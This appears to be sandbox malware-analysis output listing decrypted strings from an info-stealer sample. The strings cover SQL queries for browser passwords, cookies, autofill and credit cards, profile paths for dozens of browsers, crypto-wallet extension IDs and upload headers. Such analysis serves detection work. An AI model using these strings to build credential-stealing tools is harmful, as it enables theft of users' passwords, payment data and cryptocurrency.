Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GlobalSize
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetVersionExA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CreateFileW
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CreateFileMappingW
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CreateThread
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: lstrcpyA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: lstrcpynA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: InternetOpenA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: InternetConnectA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: HttpSendRequestA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: HttpQueryInfoA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: InternetCloseHandle
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: InternetReadFile
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: InternetSetOptionA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: wsprintfA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CharToOemW
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ReleaseDC
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetDC
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetSystemMetrics
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetDesktopWindow
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetWindowRect
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetWindowDC
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CloseWindow
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: RegQueryValueExA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: RegCloseKey
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetCurrentHwProfileA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: RegGetValueA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CreateDCA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetDeviceCaps
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SelectObject
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: BitBlt
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: DeleteObject
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: StretchBlt
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetObjectW
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetDIBits
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SaveDC
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CreateDIBSection
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: DeleteDC
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: RestoreDC
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: DsRoleGetPrimaryDomainInformation
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CryptUnprotectData
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: BCryptSetProperty
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: BCryptDecrypt
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: VaultOpenVault
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: VaultCloseVault
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: VaultEnumerateItems
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: VaultGetItemWin8
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: VaultGetItemWin7
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: VaultFree
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: StrCmpCA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: StrStrA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: PathMatchSpecA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ShellExecuteExA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GdiplusStartup
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GdiplusShutdown
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GdipDisposeImage
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GdipFree
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SymMatchString
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: HEAD
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: HTTP/1.1
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: POST
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: file
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Content-Disposition: form-data; name="file"; filename="
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Content-Type: application/octet-stream
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Content-Transfer-Encoding: binary
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SOFT:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: PROF: ?
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: PROF:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: HOST:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: USER:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: PASS:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: sqlite3_open
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: sqlite3_step
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: sqlite3_column_text
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: sqlite3_finalize
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: sqlite3_close
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: encrypted_key
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: PATH
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: PATH=
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: NSS_Init
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: NSS_Shutdown
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: PK11_Authenticate
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Cookies\%s_%s.txt
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: TRUE
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: FALSE
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Autofill\%s_%s.txt
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CC\%s_%s.txt
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Card number:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Name on card:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Expiration date:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: History\%s_%s.txt
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SELECT url FROM urls
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Downloads\%s_%s.txt
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SELECT target_path, tab_url from downloads
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Login Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Cookies
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Web Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: History
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: logins.json
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: formSubmitURL
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: usernameField
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: encryptedUsername
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: encryptedPassword
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: guid
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SELECT url FROM moz_places
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: cookies.sqlite
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: formhistory.sqlite
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: places.sqlite
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Local State
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ..\profiles.ini
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: C:\ProgramData\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Chrome
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Google\Chrome\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ChromeBeta
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Google\Chrome Beta\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ChromeCanary
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Google\Chrome SxS\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Chromium
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Chromium\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Edge_Chromium
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Microsoft\Edge\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Kometa
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Kometa\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Amigo
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Amigo\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Torch
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Torch\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Orbitum
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Orbitum\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Comodo
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Comodo\Dragon\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Nichrome
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Nichrome\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Maxthon5
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Maxthon5\Users
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Sputnik
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Sputnik\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Epic Privacy Browser\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Vivaldi
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Vivaldi\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CocCoc
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \CocCoc\Browser\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Uran
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \uCozMedia\Uran\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \QIP Surf\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Cent
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \CentBrowser\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Elements
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Elements Browser\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: TorBro
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \TorBro\Profile
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CryptoTab
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \CryptoTab Browser\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Brave
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \BraveSoftware\Brave-Browser\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Opera
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Opera Software\Opera Stable\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: OperaGX
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Opera Software\Opera GX Stable\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: OperaNeon
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Opera Software\Opera Neon\User Data
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Firefox
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Mozilla\Firefox\Profiles\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SlimBrowser
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \FlashPeak\SlimBrowser\Profiles\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: PaleMoon
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Moonchild Productions\Pale Moon\Profiles\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Waterfox
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Waterfox\Profiles\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Cyberfox
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \8pecxstudios\Cyberfox\Profiles\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: BlackHawk
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \NETGATE Technologies\BlackHawk\Profiles\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: IceCat
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Mozilla\icecat\Profiles\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: KMeleon
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \K-Meleon\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Thunderbird
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Thunderbird\Profiles\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: passwords.txt
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: TronLink
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: nkbihfbeogaeaoehlefnkodbefgpgknn
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: MetaMask
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: fhbohimaelbohpjbbldcngcnapndodjp
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Binance Chain Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ffnbelfdoeiohenkjibnmadjiehjhajb
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Yoroi
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: jbdaocneiiinmjbjlgalhcelgbejmnid
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Nifty Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: afbcbjpbpfadlkmhmclhkeeodmamcflc
